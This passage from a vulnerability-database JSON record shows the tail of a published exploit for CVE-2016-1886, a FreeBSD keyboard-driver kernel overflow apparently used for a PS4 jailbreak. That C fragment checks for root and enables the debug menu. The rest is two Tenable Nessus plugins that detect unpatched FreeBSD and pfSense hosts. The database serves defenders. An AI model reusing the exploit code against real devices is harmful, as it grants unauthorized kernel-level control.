printfsocket(\"[+] UID = %d\\n\", getuid());\r\n printfsocket(\"[+] GID = %d\\n\", getgid());\r\n \r\n // Create exploit thread\r\n if(scePthreadCreate(&thread, NULL, exploitThread, NULL, \"exploitThread\") != 0) {\r\n printfsocket(\"[-] pthread_create error\\n\");\r\n return 0;\r\n }\r\n \r\n // Wait for thread to exit\r\n scePthreadJoin(thread, NULL);\r\n \r\n // At this point we should have root and jailbreak\r\n if(getuid() != 0) {\r\n printfsocket(\"[-] Kernel patch failed!\\n\");\r\n sceNetSocketClose(sock);\r\n return 1;\r\n }\r\n \r\n printfsocket(\"[+] Kernel patch success!\\n\");\r\n \r\n // Enable debug menu\r\n int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL;\r\n RESOLVE(libKernelHandle, sysctlbyname);\r\n \r\n uint32_t enable;\r\n size_t size;\r\n \r\n enable = 1;\r\n size = sizeof(enable);\r\n \r\n sysctlbyname(\"machdep.rcmgr_utoken_store_mode\", NULL, NULL, &enable, size);\r\n sysctlbyname(\"machdep.rcmgr_debug_menu\", NULL, NULL, &enable, size);\r\n \r\n#ifdef DEBUG_SOCKET\r\n munmap(dump, PAGE_SIZE); \r\n#endif\r\n \r\n printfsocket(\"[+] bye\\n\");\r\n sceNetSocketClose(sock);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/29915", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-06T10:53:59", "description": "Incorrect signedness comparison in the ioctl(2) handler allows a\nmalicious local user to overwrite a portion of the kernel memory.\nImpact : A local user may crash the kernel, read a portion of kernel\nmemory and execute arbitrary code in kernel context. 
The result of\nexecuting an arbitrary kernel code is privilege escalation.", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "FreeBSD : FreeBSD -- Buffer overflow in keyboard driver (7bbc0e8c-600a-11e6-a6c3-14dae9d210b8)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1886"], "modified": "2016-08-12T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:FreeBSD"], "id": "FREEBSD_PKG_7BBC0E8C600A11E6A6C314DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/92923", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92923);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-1886\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:18.atkbd\");\n\n script_name(english:\"FreeBSD : FreeBSD -- Buffer overflow in keyboard driver (7bbc0e8c-600a-11e6-a6c3-14dae9d210b8)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Incorrect signedness comparison in the ioctl(2) handler allows a\nmalicious local user to overwrite a portion of the kernel memory.\nImpact : A local user may crash the kernel, read a portion of kernel\nmemory and execute arbitrary code in kernel context. 
The result of\nexecuting an arbitrary kernel code is privilege escalation.\"\n );\n # https://vuxml.freebsd.org/freebsd/7bbc0e8c-600a-11e6-a6c3-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b43363f6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:FreeBSD\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.3<10.3_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.2<10.2_17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.1<10.1_34\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=9.3<9.3_42\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-30T10:26:42", "description": "According to its self-reported version number, the remote pfSense\ninstall is prior to 2.3.1. 
It is, therefore, affected by multiple\nvulnerabilities.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-31T00:00:00", "title": "pfSense < 2.3.1 Multiple Vulnerabilities (SA-16_03 / SA-16-04)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2105", "CVE-2016-2107", "CVE-2016-1887", "CVE-2016-2109", "CVE-2016-2176", "CVE-2016-1886", "CVE-2016-2106"], "modified": "2018-01-31T00:00:00", "cpe": ["cpe:/a:pfsense:pfsense", "cpe:/a:bsdperimeter:pfsense"], "id": "PFSENSE_SA-16_04.NASL", "href": "https://www.tenable.com/plugins/nessus/106500", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106500);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/27\");\n\n script_cve_id(\n \"CVE-2016-1886\",\n \"CVE-2016-1887\",\n \"CVE-2016-2105\",\n \"CVE-2016-2106\",\n \"CVE-2016-2107\",\n \"CVE-2016-2109\",\n \"CVE-2016-2176\"\n );\n script_bugtraq_id(\n 87940,\n 89744,\n 89746,\n 89757,\n 89760,\n 90734\n );\n script_xref(name:\"EDB-ID\", value:\"39768\");\n script_xref(name:\"EDB-ID\", value:\"44212\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:17.openssl\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:18.atkbd\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:19.sendmsg\");\n\n script_name(english:\"pfSense < 2.3.1 Multiple Vulnerabilities (SA-16_03 / SA-16-04)\");\n script_summary(english:\"Checks the version of pfSense.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote firewall host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote pfSense\ninstall is prior to 2.3.1. 
It is, therefore, affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://doc.pfsense.org/index.php/2.3.1_New_Features_and_Changes\");\n # https://www.pfsense.org/security/advisories/pfSense-SA-16_03.webgui.asc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?434aa389\");\n # https://www.pfsense.org/security/advisories/pfSense-SA-16_04.filterlog.asc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f5d9b668\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to pfSense version 2.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2109\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pfsense:pfsense\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:bsdperimeter:pfsense\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"pfsense_detect.nbin\");\n script_require_keys(\"Host/pfSense\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nif (!get_kb_item(\"Host/pfSense\")) audit(AUDIT_HOST_NOT, \"pfSense\");\n\napp_info = vcf::pfsense::get_app_info();\nconstraints = [\n { \"fixed_version\" : \"2.3.1\"}\n];\n\nvcf::pfsense::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{xss:TRUE}\n);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}